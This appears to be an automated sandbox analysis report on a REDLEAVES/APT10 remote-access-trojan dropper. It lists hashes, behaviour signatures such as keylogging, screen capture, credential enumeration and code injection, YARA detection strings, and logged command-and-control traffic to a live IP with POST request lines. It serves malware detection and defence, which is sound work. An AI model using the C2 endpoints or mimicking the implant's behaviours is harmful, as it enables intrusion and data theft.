
Windows Analysis Report
cANdLlHS4N

Overview

General Information

Sample Name: cANdLlHS4N (renamed file extension from none to exe)
Analysis ID: 586425
MD5: b3139b26a2dabb9b6e728884d8fa8b33
SHA1: de5672c7940e4fad3c8145ce9e8a5fcb1da0fcee
SHA256: 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Submitted sample is a known malware sample
Writes to foreign memory regions
Contains functionality to start reverse TCP shell (cmd.exe)
Connects to many ports of the same IP (likely port scanning)
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Potential key logger detected (key state polling based)
Detected non-DNS traffic on DNS port
Queries keyboard layouts
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to detect sandboxes (mouse cursor move detection)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64
  • cANdLlHS4N.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\cANdLlHS4N.exe" MD5: B3139B26A2DABB9B6E728884D8FA8B33)
    • obedience.exe (PID: 488 cmdline: C:\Users\user\AppData\Local\Temp\obedience.exe MD5: 6A1C14D5F16A07BEF55943134FE618C0)
      • iexplore.exe (PID: 5844 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • obedience.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Local\Temp\obedience.exe" MD5: 6A1C14D5F16A07BEF55943134FE618C0)
    • iexplore.exe (PID: 244 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup
No configs have been found
Yara matches on the initial sample (Source; Rule; Description; Author; Strings):
Source: cANdLlHS4N.exe; Rule: Dropper_DeploysMalwareViaSideLoading; Description: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX; Author: USG
  • 0x135bf2:$UniqueString: 2E 6C 6E 6B 00 00 5C 00 00 00 61 76 70 75 69 2E 65 78 65
  • 0x30f9:$PsuedoRandomStringGenerator: B9 1A 00 00 00 F7 F9 46 80 C2 41 88 54 35 8B 83 FE 64
Yara matches on dropped files:
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat; Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief; Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x38a81:$RedleavesStringObfu: 73 64 65 5E 60 74 75 74 6C 6F 60 6D 5E 6D 64 60 77 64 72 5E 65 6D 6D 6C 60 68 6F 2F 65 6D 6D
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat; Rule: SUSP_XORed_MSDOS_Stub_Message; Description: Detects suspicious XORed MSDOS stub message; Author: Florian Roth
  • 0x14c7:$xo1: Osrh;kit|izv;xzuuto;y~;inu;ru;_TH;vt\x7F~
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x11d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll; Rule: OpCloudHopper_Malware_6; Description: Detects malware from Operation Cloud Hopper; Author: Florian Roth
  • 0x17d3c:$s4: SOFTWARE\EGGORG
Yara matches on memory dumps:
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp; Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief; Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x38a81:$RedleavesStringObfu: 73 64 65 5E 60 74 75 74 6C 6F 60 6D 5E 6D 64 60 77 64 72 5E 65 6D 6D 6C 60 68 6F 2F 65 6D 6D
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp; Rule: SUSP_XORed_MSDOS_Stub_Message; Description: Detects suspicious XORed MSDOS stub message; Author: Florian Roth
  • 0x14c7:$xo1: Osrh;kit|izv;xzuuto;y~;inu;ru;_TH;vt\x7F~
Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0xdd0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0xdd0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Source: 00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmp; Rule: SUSP_XORed_MSDOS_Stub_Message; Description: Detects suspicious XORed MSDOS stub message; Author: Florian Roth
  • 0x6c46:$xo1: 6\x0A\x0B\x11B\x12\x10\x0D\x05\x10\x03\x0FB\x01\x03\x0C\x0C\x0D\x16B\x07B\x10\x17\x0CB\x0B\x0CB&-1B\x0F\x0D\x06\x07
  • 0x28ccf:$xo1: Mqpj9ikv~kxt9zxwwvm9{|9klw9pw9]VJ9tv}|
Yara matches on unpacked PEs:
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x5d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack; Rule: OpCloudHopper_Malware_6; Description: Detects malware from Operation Cloud Hopper; Author: Florian Roth
  • 0x16b3c:$s4: SOFTWARE\EGGORG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x11d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack; Rule: OpCloudHopper_Malware_6; Description: Detects malware from Operation Cloud Hopper; Author: Florian Roth
  • 0x17d3c:$s4: SOFTWARE\EGGORG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack; Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn; Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
  • 0x5d0:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C F3 EB 12 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10


Source: Process started; Author: frack113; Data: Command: C:\Users\user\AppData\Local\Temp\obedience.exe, CommandLine: C:\Users\user\AppData\Local\Temp\obedience.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\obedience.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\obedience.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\obedience.exe, ParentCommandLine: "C:\Users\user\Desktop\cANdLlHS4N.exe" , ParentImage: C:\Users\user\Desktop\cANdLlHS4N.exe, ParentProcessId: 6048, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\obedience.exe, ProcessId: 488


AV Detection

Source: cANdLlHS4N.exe; Virustotal: Detection: 77%
Source: cANdLlHS4N.exe; Metadefender: Detection: 64%
Source: cANdLlHS4N.exe; ReversingLabs: Detection: 84%
Source: cANdLlHS4N.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll; Avira: detection malicious, Label: HEUR/AGEN.1226539
Source: 0.2.cANdLlHS4N.exe.2880000.3.unpack; Avira: Label: TR/ATRAPS.Gen
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Code function: 2_2_04B4B9B9 CredEnumerateA,WideCharToMultiByte,GetACP,WideCharToMultiByte,CryptUnprotectData,GetACP,WideCharToMultiByte,CredFree,2_2_04B4B9B9
Source: cANdLlHS4N.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cANdLlHS4N.exe; Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\cANdLlHS4N.exe; Code function: 0_2_009C8B98 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_strcpy_s,0_2_009C8B98
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 1_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,1_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 1_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_00405F34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Code function: 2_2_04B4B33C FindFirstFileW,FindClose,2_2_04B4B33C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 3_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 3_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00405F34
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; File opened: C:\Users\user\AppData\Local

Networking

Source: Traffic; Snort IDS: 2024173 ET TROJAN Red Leaves magic packet detected (APT10 implant) 192.168.2.4:49764 -> 67.205.132.17:80
Source: global traffic; TCP traffic: 67.205.132.17 ports 3,443,4,995,80,53
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global traffic; HTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: global traffic; HTTP traffic detected: POST /3T3t/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: global traffic; HTTP traffic detected: POST /hvnqlRD8z/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: global traffic; HTTP traffic detected: POST /23I9/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: global traffic; HTTP traffic detected: POST /M2c1Nb/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: global traffic; TCP traffic: 192.168.2.4:49757 -> 67.205.132.17:995
Source: global traffic; TCP traffic: 192.168.2.4:49746 -> 67.205.132.17:53
Source: unknown; TCP traffic detected without corresponding DNS query: 67.205.132.17
Source: unknown; TCP traffic detected without corresponding DNS query: 144.168.45.116
Source: iexplore.exe, 00000002.00000002.500224676.0000000004C70000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://67.205.132.17:443
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: cANdLlHS4N.exe, 00000000.00000002.246215033.0000000002880000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp, obedience.exe, 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe, 00000003.00000000.262529824.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe.0.dr; String found in binary or memory: http://www.audio-tool.net
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://www.globalsign.net/repository/0
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://www.globalsign.net/repository/03
Source: cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.dr; String found in binary or memory: http://www.globalsign.net/repository09
Source: unknown; HTTP traffic detected: POST /NEZTl2/index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Content-Length: 133 Host: 67.205.132.17:443
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Code function: 2_2_04B43A47 recv,recv,2_2_04B43A47
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 1_2_00429A00 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,1_2_00429A00
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; Code function: 2_2_04B55315 GetDesktopWindow,GetDC,GetDC,GetDC,CreateCompatibleDC,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,GetClientRect,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,StretchBlt,DeleteObject,DeleteObject,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,GlobalAlloc,GlobalFix,GetDIBits,VirtualAlloc,GlobalUnWire,GlobalFree,VirtualFree,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,ReleaseDC,2_2_04B55315
Source: C:\Users\user\Desktop\cANdLlHS4N.exe; Code function: 0_2_009AD29D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_009AD29D
Source: C:\Users\user\Desktop\cANdLlHS4N.exe; Code function: 0_2_009A7B6A SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_009A7B6A
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 1_2_00445BB4 GetKeyboardState,1_2_00445BB4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe; Code function: 1_2_0043D32C OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,1_2_0043D32C

System Summary

Source: cANdLlHS4N.exe, type: SAMPLE; Matched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX; Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPE; Matched rule: Detects malware from Operation Cloud Hopper; Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from Operation Cloud Hopper; Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPE; Matched rule: Detects malware from Operation Cloud Hopper; Author: Florian Roth
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPE; Matched rule: Detects malware from Operation Cloud Hopper; Author: Florian Roth
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPE; Matched rule: Detects malware from Operation Cloud Hopper; Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE; Matched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX; Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE; Matched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 0.0.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE; Matched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX; Author: USG
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY; Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT; Author: USG
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state; Author: USG
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Red Leaves malware, related to APT10; Author: David Cannings
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect RedLeaves in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPEDMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
